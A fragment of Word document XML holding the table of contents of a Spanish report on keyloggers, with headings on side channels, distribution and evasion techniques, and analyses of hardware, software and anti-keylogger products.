          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810057 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</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8" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.7.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Basados en CSS</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810058 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</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59" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.8.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Dispositivos móviles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810059 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>28</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60" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Otras técnicas usando canales laterales</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810060 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>29</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61" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.3.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Criptoanálisis acústico.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810061 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>29</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62" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.3.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Emisiones electromagnéticas.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810062 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>30</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63" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.3.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Captura inalámbrica.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810063 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>30</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64" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Técnicas de distribución</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810064 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>32</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65" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Ataques de incrustación de PDF</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810065 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>33</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66" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incrustación en documentos de Word</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810066 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>35</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67" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incrustación dentro de Scripts PowerShell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810067 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>35</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68" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Técnicas de ocultación y evasión</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810068 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="440"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810069" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Keylogger Hardware</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810069 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>37</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70" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>KeeLog KeyGrabber Pico 16Mb</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810070 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810071" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Maltronics WiFi KeyLogger Pro</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810071 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>41</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072" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Keylogger Software</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810072 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>45</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73" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Spyrix Free Keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810073 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>46</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74" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Heavenward KeyLogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810074 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>49</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75" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Conclusiones</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810075 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>51</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076" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>11.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Anti-Keyloggers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810076 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5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77" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>11.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Ghostpress</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
